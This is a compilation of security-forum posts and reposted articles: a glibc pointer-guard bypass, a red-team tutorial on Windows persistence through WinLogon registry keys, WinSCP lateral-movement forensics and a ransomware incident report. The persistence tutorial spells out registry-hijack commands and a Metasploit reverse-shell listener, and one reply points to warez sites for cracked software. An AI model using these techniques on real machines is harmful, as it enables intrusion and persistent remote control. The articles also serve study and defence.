Nytro

Do you crawl CVE Mitre/NIST NVD?

Are cineva acces la Valorant? Ma gandeam ca ne poate oferi si noua acel driver.

NetRipper intercepteaza acum traficul de la Google Chrome, Slack si Github Desktop - ultimele versiuni. https://github.com/NytroRST/NetRipper

Nu e atat de important pe care o alegi cat timp inveti singur si chiar iti gasesti un loc de munca in domeniu in timpul facultatii.

Exista niste site-uri unde e foarte posibil sa apara la un pret redus: olx.ro, lajumate.ro, publi24.ro, okazii.ro

Mai sunt 2 saptamani pentru inscriere: https://www.cybersecuritychallenge.ro/

HACKERS Heroes of the Computer Revolution STEVEN LEVY Download: http://www.temarium.com/wordpress/wp-content/documentos/Levy_S-Hackers-Heroes-Computer-Revolution.pdf

Ubuntu Desktop › Download Ubuntu desktop and replace your current operating system whether it’s Windows or macOS or run Ubuntu alongside it. Do you want to upgrade? Follow our simple guide Link: https://ubuntu.com/download

Salut, nu ai incercat niste mizerii de aparate OBD2 sa vezi daca ajuta? Sunt acelea care se conecteaza prin Bluetooth la telefon si costa 40-100 RON. Le poti folosi cu multe aplicatii free: Car Scanner (ELM227 sau cam asa ceva), Torque sau daca vrei are si versine pro. Vad ca se poate gasi hardware cu 220 RON, acel OP COM. Nu vine si cu software-ul necesar? Cat despre a-l crackui tu, e destul de greu daca nu ai experienta pe reverse engineering (e.g. ASM) si poate dura ceva timp. Nu stiu cati ar avea timp de asa ceva. Solutia mai practica ar fi sa cauti pe net pana gasesti, poate pe ceva site-uri chinezesti sau de warez/torrents.

Exista aplicatii dedicate pentru control parental si fac asta destul de bine. Din cate stiu eu si unii antivirusi au astfel de functionalitati.

Nu ma joc GTA, dar astea sunt posibilitatile: 1. Pe cont - ca sa verifici, fa un alt cont si incearca sa te joci 2. Pe IP - ca sa verifici, foloseste un VPN si incearca sa te joci, cu acelasi cont 3. Pe instalatie de joc? Adica de pe orice IP si cont ai juca de unde il ai instalat. E doar o idee, probabil nu se foloseste Daca e pe IP, poate cu un restart la router primesti alt IP extern. Poate. Daca e pe cont, nu cred ca ai ce face. Orice ar fi, poti discuta cu adminii acelui joc, pe un forum undeva, sa le explici ca nu ai facut nimic gresit (ma gandesc, desi nu cred asta) si sa te debaneze.

Din cate stiam eu, in prezent, operatorii telecom nu mai au voie sa blocheze telefoanele. Sugestia ar fi sa suni la operatorul pe care e blocat si sa te ajute.

Da, momentan e privat. Daca esti interesat, sau daca altcineva e interesat, astept un PM cu o adresa de email pentru invitatie in program.

Salut, Suntem in cautarea unui coleg in echipa de security. Cautam pe cineva senior, care sa stie foarte bine web security, dar si altele (e.g. Windows, networking, cloud). Mai exact, o persoana care sa stie lucruri avansate despre exploatarea unor vulnerabilitati, tips & tricks, bypass-uri si sa nu o deranjeze sa faca pentest cu ajutorul codului sursa - deci code review. Puteti aplica aici: https://www.linkedin.com/jobs/view/1699417011/ Sau imi puteti trimite mesaj privat. Astept de asemenea orice intrebare legata de pozitie. Mersi, // Nytro

Ceea ce ai gasit tu nu e tocmai critic si e normal sa nu se oboseasca sa repare, mai ales ca probabil nu au o echipa de securitate interna. Nu vad sa fie niciun "client information disclosure" daca te referi la GDPR. E util ceea ce faci tu, dar e si riscant pentru tine - poti fi dat in judecata, sper insa ca nu mai exista firme "comuniste" care sa faca asa ceva in prezent. Apoi, nu ar trebui sa te stresezi ca "de ce nu repara?". E treaba lor, tu ai fost OK, le-ai zis de probleme. Si in ultimul rand, nu ar trebui sa ai nicio asteptare din partea lor, sa iti ofere ceva sau sa te plateasca. O pot face unele firme, sa iti ofere ceva produs al lor sau mai stiu eu ce, ar fi frumos, dar sansele sunt destul de mici mai ales fiindca vulnerabilitatile nu sunt tocmai critice.

Exista asta: https://www.qfxsoftware.com/ Nu stiu daca te ajuta cu ceva.

Probabil, pare ca pentru persistence sa foloseasca acea cheie de registry ca sa ruleze Powershell (11:45).

Da, pare ca scrie acolo, stupid Nu ma uitasem prin cod, ma gandeam ca scrie undeva in Registry din care sa rezulte executia "imediata", sau cel putin rapida, nu dupa restart...

Nu am mai facut demult ceva pe mobile, dar din cate stiam, daca o aplicatie e "debuggable", poti folosi Frida (de exemplu) pentru instrumentare la runtime. Ai nevoie de Android Studio? Chiar ar trebui sa ma mai uit si eu pe astfel de lucruri.

Da, e tot un fel de netcat dar care suporta si DNS si ICMP. Poate fi util in cazurile in care nu se reuseste cu TCP/UDP.

ParamSpider : Parameter miner for humans Key Features : Finds parameters from web archives of the entered domain. Gives support to exclude urls with specific extensions. Saves the output result in a nice and clean manner. It mines the parameters from web archives (without interacting with the target host) Usage instructions : Note : Use python 3.7+ $ git clone https://github.com/devanshbatham/ParamSpider $ cd ParamSpider $ pip3 install -r requirements.txt $ python3 paramspider.py --domain hackerone.com Usage options : 1 - For a simple scan [without the --exclude parameter] $ python3 paramspider.py --domain hackerone.com -> Output ex : https://hackerone.com/test.php?q=FUZZ 2 - For excluding urls with specific extensions $ python3 paramspider.py --domain hackerone.com --exclude php,jpg,svg 3 - For finding nested parameters $ python3 paramspider.py --domain hackerone.com --level high -> Output ex : https://hackerone.com/test.php?p=test&q=FUZZ 4 - Saving the results $ python3 paramspider.py --domain hackerone.com --exclude php,jpg --output hackerone.txt Example : $ python3 paramspider.py --domain bugcrowd.com --exclude woff,css,js,png,svg,php,jpg --output bugcrowd.txt Note : As it fetches the parameters from web archive data , so chances of false positives are high. My Twitter : Say hello : 0xAsm0d3us Wanna show support for the tool ? I will be more than happy if you will show some love for Animals by donating to Animal Aid Unlimited ,Animal Aid Unlimited saves animals through street animal rescue, spay/neuter and education. Their mission is dedicated to the day when all living beings are treated with compassion and love. ✨ Sursa: https://github.com/devanshbatham/ParamSpider

Bypassing Pointer Guard in Linux's glibc April 12, 2020 Dr Silvio Cesare @silviocesare Summary Pointer guard is an exploit mitigation in glibc that applies to stored pointers and especially stored function pointers. A number of library calls can register function pointers that get executed later on. An example of this is registering an exit handler with atexit(). Stored function pointers are scrambled or mangled by XORing them with a secret in the thread data (fs:0x30) and applying a bitwise rotation. This mitigates control-flow hijacking by an attacker who would otherwise be able to overwrite the stored function pointer with a location of their choosing. In this blog post, I'll present a bypass for pointer guard in multithreaded applications where an attacker knows the libc base address and has an arbitrary read. Introduction Pointer guard is documented in glibc reference materials https://sourceware.org/glibc/wiki/PointerEncryption. The mitigation provides a set of macros that mangle and demangle pointers. The API to use is PTR_MANGLE and PTR_DEMANGLE. For example, if an application wants to store a function pointer in *stored_ptr, they could use the following: *stored_ptr = PTR_MANGLE(ptr) And to demangle it: ptr = PTR_DEMANGLE(*stored_ptr); The pointer mangling works by XORing the pointer with an internal 64-bit secret, then performing a bitwise left rotatation of 0x11 bits (on x86-64). Demangling is the reverse. Related Work After I tweeted the requirements for this attack, I was linked to http://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html. This is similar attack to the one I present with some specific differences. Interested readers are advised to review it. The Attack The attack is essentially a known-plaintext attack against the mangling operation. If we know the original pointer and its mangled version, we can recover the 64-bit secret. How do we get known plaintexts? The related work linked earlier shows 1 way to identify known plaintext. I will present another approach. Let's grep -rw PTR_MANGLE glibc/ --include '*.c' and examine each reference. I can quickly see an interesting use: In thread initialization, we can see a function pointer table at a fixed address (__libc_pthread_functions). If we examine what the first entry of this function pointer table, we can see that it points to __pthread_attr_destroy. This is enough to defeat pointer guard if we know the library base from an ASLR leak. This is shown in the following pseudo code. x = __libc_pthread_functions[0]; secret = rotr64(x, 0x11) ^ &__pthread_attr_destroy; There is something else we can try. Is there a possibility that there is a mangled function pointer where the function pointer is equal to 0 or perhaps -1 or another fixed constant? I write some test code to recover the cookie in a multithreaded application, and then i take the results of: PTR_MANGLE(0); PTR_MANGLE((unsigned long)-1); In GDB using the GEF debugging plugin, I use pattern-search to find any such memory in the address space that has stored one of these mangled pointers with known plaintexts (pointers). I find one. __libc_pthread_functions[1] in my particular application has a mangled NULL pointer. To defeat pointer guard then after program initialization, given the address of __libc_pthread_functions, is: secret = rotr64(__libc_pthread_functions[1], 0x11); From this point, an attacker can safely and correctly mangle their own pointers. Conclusion In this blog post, I presented an attack against the pointer guard exploit mitigation in Linux's glibc. The bypass requires the base address of libc and an arbitrary read. Sursa: https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html

Windows Persistence using WinLogon posted inRed Teaming on April 12, 2020 by Raj Chandel SHARE In this article, we are going to describe the ability of the WinLogon process to provide persistent access to the Target Machine. Table of Content Introduction Configurations used in Practical Default Registry Key Values Persistence using WinLogon Using Userinit Key Using the Shell Key Detection Mitigation Introduction The Winlogon process is a very important part of the Windows operating system, and Windows will be unusable without it. This process performs many important tasks related to the Windows sign-in process. For example, when you sign in, the Winlogon process is responsible for loading your user profile into the registry. Hence, each Windows user account is dependent on WinLogon to use the keys under HKEY_CURRENT_USER which is unique for each user account. Winlogon has special hooks into the system and watches to see if you press Ctrl+Alt+Delete. This is known as the “secure attention sequence”, and it’s why some PCs may be configured to require you to press Ctrl+Alt+Delete before you sign in. This combination of keyboard shortcuts is constantly caught by Winlogon, which guarantees you’re signing in on a safe desktop where different programs can’t monitor the password you’re typing or impersonate a sign-in dialog. The Windows Logon Application additionally monitors the keyboard and mouse action and is liable for locking your PC and starting screen savers after a time of no activity. Microsoft Official site provides a more detailed, technical list of Winlogon’s responsibilities. Configurations used in Practical Attacker: OS: Kali Linux 2020.1 IP: 192.168.1.112 Target: OS: Windows 10 IP: 192.168.1.104 Default Registry Key Values Now as discussed in the introduction, the WinLogon process controls the HKEY_CURRENT_USER. But being a Windows Propriety Software, its registry values are located in the HKEY_LOCAL_MACHINE. If we want to take a look at the Registry Key Values for WinLogon, we will have to open the Registry Editor. This can be achieved by typing Regedit in the Run Panel. Then Traverse to the following Location: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 1 Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Now here among a lot of other keys we see that we have keys named Userint and Shell of REG_SZ type. We will be using these keys to gain persistence over this machine. The scenario that can be related here is that the attacker gains a meterpreter session over the Target Machine here. The attacker can use any method of their choice. Then he uses the meterpreter session to alter the Registry Keys in WinLogon to convert its session into a persistence session. Persistence using Userinit Key Transfering Malicious Executable We created a malicious executable file named raj.exe using the msfvenom tool. More about that here. Now using the meterpreter session that we already obtained, we transfer this malicious executable to the Target Machine. We will be using the upload command of the meterpreter for this. After the file is successfully uploaded to the Target Machine, we ran the shell command. upload /root/raj.exe 1 upload /root/raj.exe Modifying Registry Values Since we have the shell of the Target System, we used the “reg query” command to get information about the Userinit Key of WinLogon. We see that it has the default value we saw earlier. Now using the “reg add” command we modified the key value to hold the malicious executable as well. shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit 1 2 3 4 shell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, raj.exe" /f reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit We ran the “reg query” command again to ensure that the values are indeed modified. We can also verify the modification manually here as shown in this image below. Gaining Persistent Shell Now that we have made the changes in the registry. We should be getting a persistent shell as soon as the WinLogon is triggered. Although we need to have a listener set up for the session that is generated. The listener should have the same configurations as IP Address and Port that were used in crafting the payload. Here we can see that we have a persistent shell. use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 exploit 1 2 3 4 5 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 exploit Persistence using Shell Key We got our persistence using the Userinit key. Now let’s focus on another key that can be used to achieve persistence over the Target Machine. It is the Shell key. It by default holds the explorer.exe as shown in the given below. Modifying Registry Values As we did in the previous practices, we will be gaining a meterpreter session, then we will be transferring the payload over to the Target Machine using the upload command. Then we will be adding the name of the executable in the Registry Value using reg add command. upload /root/raj.exe shell reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, raj.exe" /f 1 2 3 4 upload /root/raj.exe shell reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, raj.exe" /f We can verify that the payload is indeed added to the Shell Key by going to the location in the Registry Editor Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 1 Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Gaining Persistent Shell Now that we have made the changes in the registry. We should be getting a persistent shell as soon as the WinLogon is triggered. Although we need to have a listener set up for the session that is generated. The listener should have the same configurations as IP Address and Port that were used in crafting the payload. Here we can see that we have a persistent shell. use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 exploit 1 2 3 4 5 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 exploit Detection Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempted at persistence, including listing current Winlogon helper values. New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. Mitigation Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting tools like AppLocker that are capable of auditing and/or blocking unknown DLLs. Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes. We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the COVID-19. I am writing this article while Working from home. Take care and be Healthy! MITRE|ATT&CK Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn Sursa: https://www.hackingarticles.in/windows-persistence-using-winlogon/

How to Detect Lateral Movements with WinSCP You are here: Home Forensics And Investigation How to Detect Lateral Movements… Mar52020 Forensics And Investigation A common way for an attacker to move laterally within an environment is to use RDP. Forensically, we can use artifacts such as shellbags, link files and jumplists on the remote system to see what the attacker accessed when they used RDP into the system. Alternatively, an attacker can access a system remotely by using WinSCP. By using the WinSCP program, an attacker can browse folders and files on a remote system, copy them back to the system they are currently on, and also search the remote system for files. We will be working on a scenario where the attacker has already compromised a system on the network and is using WinSCP to browse to other computers on the same network. In this case, they could browse to HR systems looking for tax information, Servers looking for databases or Workstations looking for IP data. In comparison to RDP, when using WinSCP, very few artifacts are left on what they were doing on the remote system because attackers are not using the Windows Explorer shell. They can even open up remote documents from within a WinSCP text editor. Starting with Windows 10 1809 and Sever 2019, FTP/SSH is part of the optional features that can be easily installed on Windows. A simple PowerShell command can install it. Furthermore, it automatically creates a firewall rule and adds an SSH user. powershell Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 powershell Start-Service sshd powershell Set-Service -Name sshd -StartupType 'Automatic' An attacker commonly follows the below steps right after they breach a network: 1) Dump admin credentials 2) Enumerate systems to get IP addresses/Hostnames 3) Push out PowerShell scripts to all systems en-mass that do things such as disable firewalls, install backdoors and disable antivirus. Now that the “command to install SSH” task has been added, all these systems are accessible to connect to using WinSCP. The most interesting thing about WinSCP is that it comes with a portable version. The portable version makes it easy for an attacker to download and use. Many blog posts reference a registry key that contains settings for the program. However, the portable version does not store settings there. Forensically finding artifacts to help determine what was done on both the “staging” system and the remote systems on Windows 10 1909: Most of the artifacts related to WinSCP are located on the host where it was run. Running the program generates many of the common artifacts seen with file execution (Prefetch, shimcache, amcache, userassist, etc). However, the most important artifacts are the WinSCP.ini file and the SRUM database. WinSCP.ini file WinSCP.ini is a text file that contains configuration settings. It is located in the same directory as the WinSCP.exe file. At the end of a WinSCP session, the user is prompted to save their workspace: WinSCP saves valuable information in the WinSCP.ini file that can be useful to the investigation. This includes systems connected to, usernames, places on the local system where files were saved from the remote system, and the last path that was accessed on the local system. Examples of each of these configuration sections: [Configuration\CDCache] Support1@172.16.30.4=412F433A2F55736572732F<SNIP> user1@172.16.30.20=412F433A2F55736572732F<SNIP> Files have been saved in these folders: [Configuration\History\LocalTarget] 0=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil%5C*.* 1=C:%5CUsers%5CCrashOveride%5CDocuments%5CSystem3%5C*. Last folder opened on the local system: [Configuration\Interface\Commander\LocalPanel] DirViewParams=0;1|150,1;70,1;120,1;150,1;55,0;55,0;@96|5;4;0;1;2;3 StatusBar=1 DriveView=0 DriveViewHeight=100 DriveViewHeightPixelsPerInch=96 DriveViewWidth=100 DriveViewWidthPixelsPerInch=96 LastPath=C:%5CUsers%5CCrashOveride%5CDocuments%5CExfil If the session settings are saved, you get a bonus section called Sessions, with the saved session name. The default is “My Workspace”. This saves the last local directory and remote directory, along with a password. [Sessions\My%20Workspace/0000] HostName=172.16.30.4 UserName=Support1 LocalDirectory=C:%5CUsers%5Cuser1%5CDocuments%5CSystem3%5CW2s RemoteDirectory=/C:/Users/Acid%20Burn/Documents/W2s IsWorkspace=1 Password=A35C435B9556B1237C2DFE15080F2<TRUNCATED> The WinSCP.ini file appears to be updated when the session closes. As such, using the last modified date of the WinSCP.ini file with a prefetch timestamp could give you an idea of how long the last session was. Looking at this WinSCP.ini file can help an examiner determine what an attacker may have been browsing to on a remote system, and what they may have saved on the local system, even if it was deleted afterwards. SRUM database The SRUM database collects information every hour on network usage on a per-application basis. It can be an excellent resource for figuring how much data have been coied/downloaded using WinSCP. if you suspect WinSCP was used, parsing out the database can provide some details on how much data was transferred, what user account was associated with it, and the time frames that it occurred. WinSCP Remote System Artifacts To determine whether WinSCP was used to browse a remote system using WinSCP, you can look for several things: Event log entries, evidence of OpenSSH being installed, and file system timestamps. WinSCP can use any FTP/SSH server to connect to. If you suspect WinSCP may have been used, your artifacts may vary. 1. OpenSSH artifacts In order for WinSCP to connect to a system, an FTP or SSH server must be running to accept the connection. Look for artifacts indicating these services exist. For OpenSSH, look for c:/Windows/System32/OpenSSH/sshd.exe, SSHD.exe prefetch files, and the sshd.exe service. Timestamps associated with these entries may help determine the first time the attacker used it to connect. Username : sshd [1003] SID : S-1-5-21-1445295406-4253784506-242647837-1003 Full Name : sshd User Comment : Account Type : Account Created : Sun Feb 23 06:48:08 2020 Z Name : Last Login Date : Never Pwd Reset Date : Sun Feb 23 06:48:08 2020 Z Pwd Fail Date : Never Login Count : 0 –> Password does not expire –> Normal user account 2. Event Log Entries Tthere is an Event ID 4624 associated with the WinSCP client login. The login is a type 5 with the account name sshd_1860 and the domain of VIRTUAL USERS, and the process of sshd.exe: This is followed by an entry in the OpenSSH Operational event log that records the connecting IP address and account used by WinSCP to connect: File Timestamps Once logged in, the attacker can use the program to effectively browse through folders, and even open up files via WinSCP barely leaving any trace on the remote system. An indication this was occurring was that accessed dates were changed on folders and files clicked on or copied. However, access dates are NOT a reliable artifact to use when concluding and must be used with other corroborating artifacts. Below is an example of files and folders that were copied: Secure Your Organization’s Mind with Securemind.se Sursa: https://www.threathunting.se/2020/03/05/how-to-detect-lateral-movements-with-winscp/

GoGoogle Ransomware April 4, 2020 An attacker logged into the honeypot from 93.174.95[.]73, disabled security tools, dropped their toolkit and started recon. Recon was quickly followed by an onslaught of password dumping tools such as Mimikatz, Lazagne, rdpv, and more. After the attacker dumped credentials they moved laterally to multiple machines using Network Port Scanner. Minutes later the attacker focused in a Domain Controller and started deploying ransomware. Interesting Artifacts There were a bunch of artifacts dropped during this compromise. Most of these are password dumping tools with the exception of !start.cmd and Advanced IP Scanner. The !start.cmd script appears to use the above artifacts to dump credentials from the machine. The script is written to handle 64 and 32 bit systems as it checks the processor architecture before running each of the password dumping tools. The first half of the script runs Mimikatz, Lazagne, BulletsPassView, netpass, PasswordFox, SniffPass, and WirelessKeyView. The second half of the script runs ChromePass, Dialupass, iepv, mailpv, mspass, OperaPassView, pspv, PstPassword, rdpv, RouterPassView, VNCPassView, and WebBrowserPassView before deleting the mimikatz files. The artifact can be downloaded here. One thing to notice here is the folder named passrecpk. After doing some further research we believe this folder most likely correlates to the free NirSoft toolpack named passrecenc.zip. Most of the NirSoft tools above are in passrecenc.zip. The next artifact is a Mimikatz parser. The goal of this script is to parse out the Mimikatz output so its easier for the actor to use passwords/NTLM. We saw the actors open up the Passwords.txt file which included username:password for logged in users. The artifact can be downloaded here. Another interesting artifact is Remote Desktop PassView (rpv.exe) created by NirSoft which reveals passwords stored in .rdp files. This is a great example of why you shouldnt store passwords in rdp files. Example of the PowerShell scripts and other recon elements executed: We were not able to acquire these files but here are our thoughts: lubrute.ps1 – We believe this script was used to brute force local accounts. adbrute.ps1 – We believe this script was used to brute force AD accounts. Find-Pass.ps1 – We believe this script was used to run mimikatz and the other password dumping tools. NetADPC.ps1 – We believe this script launched Network Port Scanner and helped with RDP connections. The ransomware was deployed in a manual fashion requiring the actor to RDP to each machine that Network Port Scanner found. The specific executable looks to be new, currently identified as GoGoogle by id-ransomware. bild.exe|9330544a69b499f9b2ea79fd5a57bccc 9330544a69b499f9b2ea79fd5a57bccc 17cf9b71e0f8cf3068977c670499ed816e1b65ab 8805ce23c95a5049ca6d9678f419848b3ace3f1a0cdd36d3867d7d827ab5f4e8 Looking at the binary itself we can see that much of the code is written using Go and the compiler/creator used the name demon777. Before encrypting files the ransomware uses many windows utilities such as WMI, taskkill, WEVTUTIL, and net.exe to kill processes and remove logs from the system. Example of Logs being cleared: Example of processes being killed: Here is a long list of services killed before the ransomware encryption process starts: AcronisActiveProtectionService,AcronisAgent,AcronisMonitoringService,AcronisZmqGw,AcrSch2Svc,AdobeActiveFileMonitor10.0,AdobeARMservice,AdobeFlashPlayerUpdateSvc,AdobeUpdateService,ADWS,AGMService,AGSService,AmazonSSMAgent,AMPPALR3,AMS,AnyDesk,Apple,ARSM,ASM,aspnet_state,Atenet.Service,Backupper,BASupportExpressSrvcUpdater_LOGICnow,BASupportExpressSrvcUpdater_N_Central,BASupportExpressStandaloneService_LOGICnow,BASupportExpressStandaloneService_N_Central,BayanService,bkserv,BTHSSecurityMgr,btwdins,CcmExec,Check_MK_Agent,CIMnotify,Cissesrv,ClickToRunSvc,CodeMeter.exe,CpqNicMgmt,CpqRcmc3,cpqvcagent,CqMgHost,CqMgServ,CqMgStor,cramsrv,crserv,crsyslog,dbex,DESIGO,discagt,disvc,dlhm,DPMClientService,DpmCPWrapperService,DPMRA,DriveLock,dwmrcs,Dyn,Ec2Config,EcuRemote,EFI,ekrn,ekrnEpfw,EpsonBidirectionalService,EpsonScanSvc,FileOpenManagerSvc,firebirdguardiandefaultinstance,FirebirdGuardiansgsSFBServer,FirebirdServersgsSFBServer,FlowExport,FontCache3.0.0.0,fvstermiser,HealthService,hist32,hMailServer,HostControllerService,HPSIService,HPWMISTOR,IAStorDataMgrSvc,ibmiasrw,IISADMIN,iPod,jhi_service,LavasoftTcpService,LicSvrM,MacriumService,Microsoft.Crm.VssWriterService.exe,MMAExtensionHeartbeatService,MMS,MSComplianceAudit,MSCRMAsyncService,MSCRMAsyncService$maintenance,MSCRMMonitoringService,MSCRMSandboxService,MSCRMUnzipService,MSDTC,MsDtsServer100,MSExchangeAB,MSExchangeADTopology,MSExchangeAntispamUpdate,MSExchangeCompliance,MSExchangeDagMgmt,MSExchangeDelivery,MSExchangeDiagnostics,MSExchangeEdgeSync,MSExchangeFastSearch,MSExchangeFBA,MSExchangeFDS,MSExchangeFrontEndTransport,MSExchangeHM,MSExchangeHMRecovery,MSExchangeImap4,MSExchangeIMAP4BE,MSExchangeIS,MSExchangeMailboxAssistants,MSExchangeMailboxReplication,MSExchangeMailSubmission,MSExchangeMonitoring,MSExchangeNotificationsBroker,MSExchangePop3,MSExchangePOP3BE,MSExchangeProtectedServiceHost,MSExchangeRepl,MSExchangeRPC,MSExchangeSA,MSExchangeSearch,MSExchangeServiceHost,MSExchangeSubmission,MSExchangeThrottling,MSExchangeTransport,MSExchangeTransportLogSearch,MSExchangeUM,MSExchangeUMCR,msftesql,Exchange,MSMQ,MSOLAP$SQL,MSSQL$CRMVIEW,MSSQL$CRMVIEW2,MSSQL$ISARS,MSSQL$MSFW,MSSQLFDLauncher,MSSQLLaunchpad$SQLEXPRESS,MSSQLSERVER,MSSQLServerADHelper100,MSSQLServerOLAPService,MySQL,MySQL55,NetPipeActivator,NetTcpActivator,NetTcpPortSharing,NGCLIENT,ntfsvc,nvsvc,NVWMI,OpenVPNAccessClient,OracleMTSRecoveryService,OracleOraDb11g_home1ClrAgent,OracleOraDb11g_home1TNSListener,OracleServiceINFAORCL,ose,osppsvc,PCoIPAgent,PCoIPArbiterService,PCoIPPrintingSvc,PolicyAgent,ProLiantMonitor,QBCFMonitorService,QBFCService,QBPOSDBServiceV12,QBVSS,QuickBooksDB1,QuickBooksDB10,QuickBooksDB11,QuickBooksDB12,QuickBooksDB13,QuickBooksDB14,QuickBooksDB15,QuickBooksDB16,QuickBooksDB17,QuickBooksDB18,QuickBooksDB19,QuickBooksDB2,QuickBooksDB20,QuickBooksDB21,QuickBooksDB22,QuickBooksDB23,QuickBooksDB24,QuickBooksDB25,QuickBooksDB3,QuickBooksDB4,QuickBooksDB5,QuickBooksDB6,QuickBooksDB7,QuickBooksDB8,QuickBooksDB9,RdAgent,Realtek11nCU,ReportServer,ReportServer$ISARS,ReportServer$SQL,RtkAudioService,SageEvolutionEcommService,SDRSVC,SearchExchangeTracing,SentinelKeysServer,SentinelProtectionServer,SentinelSecurityRuntime,Service,ShadowProtectSvc,ShutdownMon,SkyLightWorkspaceConfigService,SNMPTRAP,SoftwareProxyJavaChecker,SolarWindsAgent64,SPAdminV4,Spooler,sppsvc,SPSearch4,SPTimerV4,SPTraceV4,SPUserCodeV4,SPWriterV4,SQLAgent$ISARS,SQLAgent$MSFW,SQLBrowser,SQLSERVERAGENT,SQLServerReportingServices,SQLTELEMETRY$SQLEXPRESS,SQLWriter,sshd,Stxhd.HostAgents.HAService,swprv,sysdown,SysMgmtHp,TdmService,TeamViewer,TeamViewer1,TeamViewer10,TeamViewer11,TeamViewer12,TeamViewer2,TeamViewer3,TeamViewer4,TeamViewer5,TeamViewer6,TeamViewer7,TeamViewer8,TeamViewer9,Tomcat8Testing,Tomcat9,tvnserver,UltraViewService,UNS,uvnc_service,vcsFPService,VeeamCatalogSvc,VeeamCloudSvc,VeeamDeploySvc,VeeamMountSvc,VeeamNFSSvc,VeeamTransportSvc,VGAuthService,VisualSVNServer,VMAuthdService,vmicheartbeat,vmickvpexchange,vmicrdv,vmicshutdown,vmictimesync,vmicvss,VMnetDHCP,VMTools,VMUSBArbService,VMware,VMwareHostd,VSS,wbengine,WindowsAzureGuestAgent,WindowsAzureNetAgentSvc,WindowsAzureTelemetryService,wlidsvc,WMPNetworkSvc,Wrmserv,wsbexchange,WSearch The ransom note left behind left an ID and used an email address as outreach to the attackers using the qq.com service. Contact was made with the ransomer and they asked for 2 BTC (13,400 USD at time of writing). It is possible that this was per ransomed device, but the lab was reset with only a single ransom note collected before indicators were removed. While leaving the ransom note, it appears the actors were planting the capability to potentially return in the future should the systems not receive a full wipe using a Utilman.exe backdoor to allow system cmd access at the login screen. Summary These attackers moved fairly fast as they were able to go from zero to installing ransomware on 5+ machines in just over an hour. There were a ton of artifacts dropped by this attacker which were mostly NirSoft tools but the attackers did have a few of their own scripts. The attackers ran a few commands that may be easy to detect such as enabling network discovery, replacing Utilman with cmd, clearing logs and killing a bunch of services such as TeamViewer1. We found some interesting strings in the bild binary which could make for a good Yara rule. If you have any further questions please feel free to reach out to us via the Contact Us page. IOCs In the future IOCs will be posted to MISP but right now you can find them on pastebin. Sursa: https://thedfirreport.com/2020/04/04/gogoogle-ransomware/